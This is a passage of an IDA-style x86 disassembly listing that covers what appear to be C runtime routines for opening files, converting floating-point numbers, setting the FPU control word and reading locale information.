; sub_41F885+112�j
mov [ebp+var_C], 1
loc_41F9C3: ; CODE XREF: sub_41F885+F2�j
; sub_41F885+FB�j ...
mov eax, [ebp+arg_C]
test eax, edi
mov esi, 80h
jz short loc_41F9E1
mov ecx, dword_481160
not ecx
and ecx, [ebp+arg_10]
test cl, cl
js short loc_41F9E1
xor esi, esi
inc esi
loc_41F9E1: ; CODE XREF: sub_41F885+148�j
; sub_41F885+157�j
test al, 40h
jz short loc_41F9FC
or byte ptr [ebp+var_10+2], 1
or esi, 4000000h
cmp dword_481164, 2
jnz short loc_41F9FC
or [ebp+var_8], 4
loc_41F9FC: ; CODE XREF: sub_41F885+15E�j
; sub_41F885+171�j
test ah, 10h
jz short loc_41FA03
or esi, edi
loc_41FA03: ; CODE XREF: sub_41F885+17A�j
test al, 20h
jz short loc_41FA0F
or esi, 8000000h
jmp short loc_41FA19
; ---------------------------------------------------------------------------
loc_41FA0F: ; CODE XREF: sub_41F885+180�j
test al, 10h
jz short loc_41FA19
or esi, 10000000h
loc_41FA19: ; CODE XREF: sub_41F885+188�j
; sub_41F885+18C�j
call sub_41F5E1
mov edi, eax
or ebx, 0FFFFFFFFh
cmp edi, ebx
jnz short loc_41FA41
call sub_41B935
mov dword ptr [eax], 18h
call sub_41B93E
and dword ptr [eax], 0
loc_41FA3A: ; CODE XREF: sub_41F885+208�j
mov eax, ebx
jmp loc_41FB1C
; ---------------------------------------------------------------------------
loc_41FA41: ; CODE XREF: sub_41F885+1A0�j
mov eax, [ebp+arg_0]
push 0
push esi
push [ebp+var_C]
mov dword ptr [eax], 1
mov eax, [ebp+arg_4]
mov [eax], edi
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
push [ebp+var_10]
push [ebp+arg_8]
call dword_422034 ; CreateFileA
mov esi, eax
cmp esi, ebx
jz short loc_41FA80
push esi
call dword_4221D4 ; GetFileType
test eax, eax
jnz short loc_41FA8F
push esi
call dword_42202C ; CloseHandle
loc_41FA80: ; CODE XREF: sub_41F885+1E7�j
call dword_422004 ; RtlGetLastWin32Error
push eax
call sub_41B947
pop ecx
jmp short loc_41FA3A
; ---------------------------------------------------------------------------
loc_41FA8F: ; CODE XREF: sub_41F885+1F2�j
cmp eax, 2
jnz short loc_41FA9A
or [ebp+var_1], 40h
jmp short loc_41FAA3
; ---------------------------------------------------------------------------
loc_41FA9A: ; CODE XREF: sub_41F885+20D�j
cmp eax, 3
jnz short loc_41FAA3
or [ebp+var_1], 8
loc_41FAA3: ; CODE XREF: sub_41F885+213�j
; sub_41F885+218�j
push esi
push edi
call sub_41F410
or [ebp+var_1], 1
mov eax, edi
sar eax, 5
lea ebx, ds:4815E0h[eax*4]
mov eax, edi
and eax, 1Fh
lea esi, [eax+eax*8]
mov al, [ebp+var_1]
pop ecx
pop ecx
mov ecx, [ebx]
shl esi, 2
mov [ebp+var_1], al
and [ebp+var_1], 48h
mov [esi+ecx+4], al
jnz short loc_41FB05
test al, al
jns short loc_41FB05
test byte ptr [ebp+arg_C], 2
jz short loc_41FB05
push 2
push 0FFFFFFFFh
push edi
call sub_41D676
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41FB21
call sub_41B93E
cmp dword ptr [eax], 83h
jnz short loc_41FB60
loc_41FB05: ; CODE XREF: sub_41F885+252�j
; sub_41F885+256�j ...
cmp [ebp+var_1], 0
jnz short loc_41FB1A
test byte ptr [ebp+arg_C], 8
jz short loc_41FB1A
mov eax, [ebx]
lea eax, [esi+eax+4]
or byte ptr [eax], 20h
loc_41FB1A: ; CODE XREF: sub_41F885+284�j
; sub_41F885+28A�j
mov eax, edi
loc_41FB1C: ; CODE XREF: sub_41F885+129�j
; sub_41F885+1B7�j
pop edi
loc_41FB1D: ; CODE XREF: sub_41F885+9C�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41FB21: ; CODE XREF: sub_41F885+271�j
and [ebp+var_2], 0
push 1
lea eax, [ebp+var_2]
push eax
push edi
call sub_41B217
add esp, 0Ch
test eax, eax
jnz short loc_41FB4E
cmp [ebp+var_2], 1Ah
jnz short loc_41FB4E
push [ebp+var_10]
push edi
call sub_42098E
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_41FB60
loc_41FB4E: ; CODE XREF: sub_41F885+2B1�j
; sub_41F885+2B7�j
push 0
push 0
push edi
call sub_41D676
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_41FB05
loc_41FB60: ; CODE XREF: sub_41F885+27E�j
; sub_41F885+2C7�j
push edi
call sub_41AD23
pop ecx
jmp loc_41F9AB
sub_41F885 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FB6C proc near ; CODE XREF: sub_41B7CD+137�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset stru_42CB70
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
mov ecx, [ebp+arg_8]
call sub_41F885
add esp, 14h
mov [ebp+var_24], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41FBB1
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_41FB6C endp
; =============== S U B R O U T I N E =======================================
sub_41FBB1 proc near ; CODE XREF: sub_41FB6C+37�p
; DATA XREF: .text:stru_42CB70�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_41FBC0
push dword ptr [ebp-20h]
call sub_41F5BF
pop ecx
locret_41FBC0: ; CODE XREF: sub_41FBB1+4�j
retn
sub_41FBB1 endp
; =============== S U B R O U T I N E =======================================
sub_41FBC1 proc near ; CODE XREF: sub_41FC40+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 20h
pop ecx
cdq
idiv ecx
push 1Fh
pop ecx
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
mov ecx, [esp+arg_0]
not edx
test [ecx+eax*4], edx
jz short loc_41FBE9
loc_41FBE0: ; CODE XREF: sub_41FBC1+26�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41FBE3: ; CODE XREF: sub_41FBC1+2C�j
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41FBE0
loc_41FBE9: ; CODE XREF: sub_41FBC1+1D�j
inc eax
cmp eax, 3
jl short loc_41FBE3
xor eax, eax
inc eax
retn
sub_41FBC1 endp
; =============== S U B R O U T I N E =======================================
sub_41FBF3 proc near ; CODE XREF: sub_41FC40+42�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push edi
push 20h
pop ecx
cdq
idiv ecx
mov edi, [esp+8+arg_0]
mov esi, eax
lea eax, [edi+esi*4]
push eax
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
push edx
push dword ptr [eax]
call sub_420AC9
add esp, 0Ch
dec esi
js short loc_41FC3D
lea edi, [edi+esi*4]
loc_41FC24: ; CODE XREF: sub_41FBF3+48�j
test eax, eax
jz short loc_41FC3D
push edi
push 1
push dword ptr [edi]
call sub_420AC9
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_41FC24
loc_41FC3D: ; CODE XREF: sub_41FBF3+2C�j
; sub_41FBF3+33�j
pop edi
pop esi
retn
sub_41FBF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FC40 proc near ; CODE XREF: sub_41FD61+79�p
; sub_41FD61+C2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
dec edi
push 20h
lea eax, [edi+1]
pop ecx
cdq
idiv ecx
push 1Fh
pop esi
sub esi, edx
xor edx, edx
inc edx
mov ecx, esi
shl edx, cl
mov ebx, eax
mov eax, [ebp+arg_0]
test [eax+ebx*4], edx
jz short loc_41FC8F
lea ecx, [edi+1]
push ecx
push eax
call sub_41FBC1
test eax, eax
pop ecx
pop ecx
jnz short loc_41FC8C
push edi
push [ebp+arg_0]
call sub_41FBF3
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_41FC8C: ; CODE XREF: sub_41FC40+3C�j
mov eax, [ebp+arg_0]
loc_41FC8F: ; CODE XREF: sub_41FC40+2C�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax+ebx*4], edx
inc ebx
cmp ebx, ecx
jge short loc_41FCAA
lea edi, [eax+ebx*4]
sub ecx, ebx
xor eax, eax
rep stosd
loc_41FCAA: ; CODE XREF: sub_41FC40+5F�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41FC40 endp
; =============== S U B R O U T I N E =======================================
sub_41FCB2 proc near ; CODE XREF: sub_41FD61+6D�p
; sub_41FD61+AC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push 3
pop edx
sub ecx, eax
push esi
loc_41FCC0: ; CODE XREF: sub_41FCB2+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_41FCC0
pop esi
retn
sub_41FCB2 endp
; =============== S U B R O U T I N E =======================================
sub_41FCCD proc near ; CODE XREF: sub_41FD61+4D�p
arg_0 = dword ptr 4
xor eax, eax
loc_41FCCF: ; CODE XREF: sub_41FCCD+10�j
mov ecx, [esp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41FCE3
inc eax
cmp eax, 3
jl short loc_41FCCF
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41FCE3: ; CODE XREF: sub_41FCCD+A�j
xor eax, eax
retn
sub_41FCCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FCE6 proc near ; CODE XREF: sub_41FD61+B6�p
; sub_41FD61+D0�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
pop esi
cdq
mov ecx, esi
idiv ecx
mov ebx, [ebp+arg_0]
or edi, 0FFFFFFFFh
mov [ebp+arg_4], esi
mov ecx, edx
shl edi, cl
mov [ebp+var_8], eax
xor eax, eax
sub [ebp+arg_4], edx
not edi
mov [ebp+var_4], eax
loc_41FD14: ; CODE XREF: sub_41FCE6+51�j
mov esi, [ebx+eax*4]
mov ecx, esi
and ecx, edi
mov [ebp+var_C], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+arg_4]
or esi, [ebp+var_4]
mov [ebx+eax*4], esi
mov esi, [ebp+var_C]
shl esi, cl
inc eax
cmp eax, 3
mov [ebp+var_4], esi
jl short loc_41FD14
push 2
pop eax
mov ecx, eax
sub ecx, [ebp+var_8]
lea ecx, [ebx+ecx*4]
loc_41FD44: ; CODE XREF: sub_41FCE6+74�j
cmp eax, [ebp+var_8]
jl short loc_41FD50
mov edx, [ecx]
mov [ebx+eax*4], edx
jmp short loc_41FD54
; ---------------------------------------------------------------------------
loc_41FD50: ; CODE XREF: sub_41FCE6+61�j
and dword ptr [ebx+eax*4], 0
loc_41FD54: ; CODE XREF: sub_41FCE6+68�j
dec eax
sub ecx, 4
test eax, eax
jge short loc_41FD44
pop edi
pop esi
pop ebx
leave
retn
sub_41FCE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FD61 proc near ; CODE XREF: sub_41FEB9+D�p
; sub_41FECF+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
shl eax, 10h
and edi, 7FFFh
sub edi, 3FFFh
cmp edi, 0FFFFC001h
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
mov [ebp+var_8], ecx
push eax
jnz short loc_41FDCA
xor ebx, ebx
call sub_41FCCD
test eax, eax
pop ecx
jnz loc_41FE79
lea edi, [ebp+var_C]
stosd
stosd
stosd
loc_41FDC2: ; CODE XREF: sub_41FD61+DA�j
push 2
pop eax
jmp loc_41FE7B
; ---------------------------------------------------------------------------
loc_41FDCA: ; CODE XREF: sub_41FD61+49�j
lea eax, [ebp+var_18]
push eax
call sub_41FCB2
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41FC40
add esp, 10h
test eax, eax
jz short loc_41FDE7
inc edi
loc_41FDE7: ; CODE XREF: sub_41FD61+83�j
mov eax, [esi+4]
mov ecx, eax
sub ecx, [esi+8]
cmp edi, ecx
jge short loc_41FDFD
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
jmp short loc_41FE39
; ---------------------------------------------------------------------------
loc_41FDFD: ; CODE XREF: sub_41FD61+90�j
cmp edi, eax
jg short loc_41FE3D
sub eax, edi
mov edi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41FCB2
lea eax, [ebp+var_C]
push edi
push eax
call sub_41FCE6
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41FC40
mov eax, [esi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_41FCE6
add esp, 20h
loc_41FE39: ; CODE XREF: sub_41FD61+9A�j
xor ebx, ebx
jmp short loc_41FDC2
; ---------------------------------------------------------------------------
loc_41FE3D: ; CODE XREF: sub_41FD61+9E�j
cmp edi, [esi]
push dword ptr [esi+0Ch]
jl short loc_41FE65
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_41FCE6
mov ebx, [esi+14h]
add ebx, [esi]
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_41FE7B
; ---------------------------------------------------------------------------
loc_41FE65: ; CODE XREF: sub_41FD61+E1�j
mov ebx, [esi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add ebx, edi
call sub_41FCE6
pop ecx
pop ecx
loc_41FE79: ; CODE XREF: sub_41FD61+55�j
xor eax, eax
loc_41FE7B: ; CODE XREF: sub_41FD61+64�j
; sub_41FD61+102�j
push 1Fh
pop ecx
sub ecx, [esi+0Ch]
mov esi, [esi+10h]
shl ebx, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
or ebx, [ebp+var_C]
cmp esi, 40h
jnz short loc_41FEAA
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_41FEB4
; ---------------------------------------------------------------------------
loc_41FEAA: ; CODE XREF: sub_41FD61+13A�j
cmp esi, 20h
jnz short loc_41FEB4
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_41FEB4: ; CODE XREF: sub_41FD61+147�j
; sub_41FD61+14C�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FD61 endp
; =============== S U B R O U T I N E =======================================
sub_41FEB9 proc near ; CODE XREF: sub_41FEE5+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_432DB0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41FD61
add esp, 0Ch
retn
sub_41FEB9 endp
; =============== S U B R O U T I N E =======================================
sub_41FECF proc near ; CODE XREF: sub_41FF28+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_432DC8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41FD61
add esp, 0Ch
retn
sub_41FECF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FEE5 proc near ; CODE XREF: sub_41BB7D+12�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_432A48
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_420C87
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41FEB9
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_41C526
leave
retn
sub_41FEE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF28 proc near ; CODE XREF: sub_41BB7D+2D�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_432A48
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_420C87
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41FECF
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_41C526
leave
retn
sub_41FF28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF6B proc near ; CODE XREF: sub_41BC86+4D�p
; sub_41BD96+41�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
mov ecx, [edx+0Ch]
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
push esi
mov esi, [ebp+arg_0]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
mov eax, edi
jle short loc_41FFA8
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_41FF8E: ; CODE XREF: sub_41FF6B+38�j
mov dl, [ecx]
test dl, dl
jz short loc_41FF9A
movsx edx, dl
inc ecx
jmp short loc_41FF9D
; ---------------------------------------------------------------------------
loc_41FF9A: ; CODE XREF: sub_41FF6B+27�j
push 30h
pop edx
loc_41FF9D: ; CODE XREF: sub_41FF6B+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_41FF8E
mov edx, [ebp+arg_8]
loc_41FFA8: ; CODE XREF: sub_41FF6B+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_41FFC1
cmp byte ptr [ecx], 35h
jl short loc_41FFC1
jmp short loc_41FFB9
; ---------------------------------------------------------------------------
loc_41FFB6: ; CODE XREF: sub_41FF6B+52�j
mov byte ptr [eax], 30h
loc_41FFB9: ; CODE XREF: sub_41FF6B+49�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_41FFB6
inc byte ptr [eax]
loc_41FFC1: ; CODE XREF: sub_41FF6B+42�j
; sub_41FF6B+47�j
cmp byte ptr [esi], 31h
jnz short loc_41FFCB
inc dword ptr [edx+4]
jmp short loc_41FFDD
; ---------------------------------------------------------------------------
loc_41FFCB: ; CODE XREF: sub_41FF6B+59�j
push edi
call sub_419D00
inc eax
push eax
push edi
push esi
call sub_41EFF0
add esp, 10h
loc_41FFDD: ; CODE XREF: sub_41FF6B+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41FF6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FFE2 proc near ; CODE XREF: sub_42009C+1B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx+6]
push ebx
push esi
push edi
mov edi, 7FFh
mov esi, 80000000h
mov [ebp+var_4], esi
mov ecx, eax
shr ecx, 4
and eax, 8000h
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
and eax, 0FFFFFh
test ebx, ebx
jz short loc_420032
cmp ebx, edi
jz short loc_42002B
lea edi, [ecx+3C00h]
jmp short loc_420053
; ---------------------------------------------------------------------------
loc_42002B: ; CODE XREF: sub_41FFE2+3F�j
mov edi, 7FFFh
jmp short loc_420053
; ---------------------------------------------------------------------------
loc_420032: ; CODE XREF: sub_41FFE2+3B�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_42004A
cmp edx, ebx
jnz short loc_42004A
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_420097
; ---------------------------------------------------------------------------
loc_42004A: ; CODE XREF: sub_41FFE2+54�j
; sub_41FFE2+58�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_420053: ; CODE XREF: sub_41FFE2+47�j
; sub_41FFE2+4E�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_42008E
loc_42006F: ; CODE XREF: sub_41FFE2+AA�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
shl edx, 1
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_42006F
loc_42008E: ; CODE XREF: sub_41FFE2+8B�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_420097: ; CODE XREF: sub_41FFE2+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FFE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42009C proc near ; CODE XREF: sub_41BC86+23�p
; sub_41BD96+22�p ...
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_432A48
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41FFE2
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_4210C1
mov esi, [ebp+arg_8]
mov edi, [ebp+arg_C]
mov [esi+8], eax
movsx eax, [ebp+var_2A]
mov [esi], eax
movsx eax, [ebp+var_2C]
mov [esi+4], eax
lea eax, [ebp+var_28]
push eax
push edi
call sub_41BF70
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 20h
mov [esi+0Ch], edi
mov eax, esi
call sub_41C526
pop edi
pop esi
leave
retn
sub_42009C endp
; =============== S U B R O U T I N E =======================================
sub_42010E proc near ; CODE XREF: sub_4189AC+43E�p
; sub_4189AC+459�p ...
push 2
call sub_4185EA
pop ecx
retn
sub_42010E endp
; =============== S U B R O U T I N E =======================================
sub_420117 proc near ; CODE XREF: sub_420237+C�p
xor eax, eax
test bl, 1
jz short loc_420121
push 10h
pop eax
loc_420121: ; CODE XREF: sub_420117+5�j
test bl, 4
jz short loc_420129
or eax, 8
loc_420129: ; CODE XREF: sub_420117+D�j
test bl, 8
jz short loc_420131
or eax, 4
loc_420131: ; CODE XREF: sub_420117+15�j
test bl, 10h
jz short loc_420139
or eax, 2
loc_420139: ; CODE XREF: sub_420117+1D�j
test bl, 20h
jz short loc_420141
or eax, 1
loc_420141: ; CODE XREF: sub_420117+25�j
test bl, 2
jz short loc_42014B
or eax, 80000h
loc_42014B: ; CODE XREF: sub_420117+2D�j
push ebp
movzx edx, bx
push esi
mov ecx, edx
mov esi, 0C00h
and ecx, esi
push edi
mov edi, 300h
mov ebp, 200h
jz short loc_420187
cmp ecx, 400h
jz short loc_420182
cmp ecx, 800h
jz short loc_42017E
cmp ecx, esi
jnz short loc_420187
or eax, edi
jmp short loc_420187
; ---------------------------------------------------------------------------
loc_42017E: ; CODE XREF: sub_420117+5D�j
or eax, ebp
jmp short loc_420187
; ---------------------------------------------------------------------------
loc_420182: ; CODE XREF: sub_420117+55�j
or eax, 100h
loc_420187: ; CODE XREF: sub_420117+4D�j
; sub_420117+61�j ...
and edx, edi
jz short loc_420196
cmp edx, ebp
jnz short loc_42019B
or eax, 10000h
jmp short loc_42019B
; ---------------------------------------------------------------------------
loc_420196: ; CODE XREF: sub_420117+72�j
or eax, 20000h
loc_42019B: ; CODE XREF: sub_420117+76�j
; sub_420117+7D�j
test bh, 10h
pop edi
pop esi
pop ebp
jz short locret_4201A8
or eax, 40000h
locret_4201A8: ; CODE XREF: sub_420117+8A�j
retn
sub_420117 endp
; =============== S U B R O U T I N E =======================================
sub_4201A9 proc near ; CODE XREF: sub_420237+22�p
xor eax, eax
test bl, 10h
jz short loc_4201B1
inc eax
loc_4201B1: ; CODE XREF: sub_4201A9+5�j
test bl, 8
jz short loc_4201B9
or eax, 4
loc_4201B9: ; CODE XREF: sub_4201A9+B�j
test bl, 4
jz short loc_4201C1
or eax, 8
loc_4201C1: ; CODE XREF: sub_4201A9+13�j
test bl, 2
jz short loc_4201C9
or eax, 10h
loc_4201C9: ; CODE XREF: sub_4201A9+1B�j
test bl, 1
jz short loc_4201D1
or eax, 20h
loc_4201D1: ; CODE XREF: sub_4201A9+23�j
test ebx, 80000h
jz short loc_4201DC
or eax, 2
loc_4201DC: ; CODE XREF: sub_4201A9+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_420210
cmp ecx, 100h
jz short loc_42020B
cmp ecx, esi
jz short loc_420204
cmp ecx, edx
jnz short loc_420210
or eax, 0C00h
jmp short loc_420210
; ---------------------------------------------------------------------------
loc_420204: ; CODE XREF: sub_4201A9+4E�j
or eax, 800h
jmp short loc_420210
; ---------------------------------------------------------------------------
loc_42020B: ; CODE XREF: sub_4201A9+4A�j
or eax, 400h
loc_420210: ; CODE XREF: sub_4201A9+42�j
; sub_4201A9+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_420226
cmp ecx, 10000h
jnz short loc_420228
or eax, esi
jmp short loc_420228
; ---------------------------------------------------------------------------
loc_420226: ; CODE XREF: sub_4201A9+6F�j
or eax, edx
loc_420228: ; CODE XREF: sub_4201A9+77�j
; sub_4201A9+7B�j
test ebx, 40000h
pop esi
jz short locret_420236
or eax, 1000h
locret_420236: ; CODE XREF: sub_4201A9+86�j
retn
sub_4201A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420237 proc near ; CODE XREF: sub_420269+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
fstcw word ptr [ebp+var_4]
mov ebx, [ebp+var_4]
call sub_420117
mov ebx, eax
mov eax, [ebp+arg_4]
not eax
and ebx, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or ebx, eax
call sub_4201A9
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
mov eax, ebx
pop ebx
leave
retn
sub_420237 endp
; =============== S U B R O U T I N E =======================================
sub_420269 proc near ; CODE XREF: sub_41BEEF+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_420237
pop ecx
pop ecx
retn
sub_420269 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42027F proc near ; CODE XREF: sub_41C139+27D�p
; sub_41E8E0+15E�p ...
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_432A48
xor eax, [ebp+4]
and [ebp+var_6], 0
push 6
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
call dword_42211C ; GetLocaleInfoA
test eax, eax
jnz short loc_4202B1
or eax, 0FFFFFFFFh
jmp short loc_4202BB
; ---------------------------------------------------------------------------
loc_4202B1: ; CODE XREF: sub_42027F+2B�j
lea eax, [ebp+var_C]
push eax
call sub_416C0A
pop ecx
loc_4202BB: ; CODE XREF: sub_42027F+30�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_41C526
leave
retn
sub_42027F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4202C8 proc near ; CODE XREF: sub_41C139+2A8�p
; sub_41C139+366�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
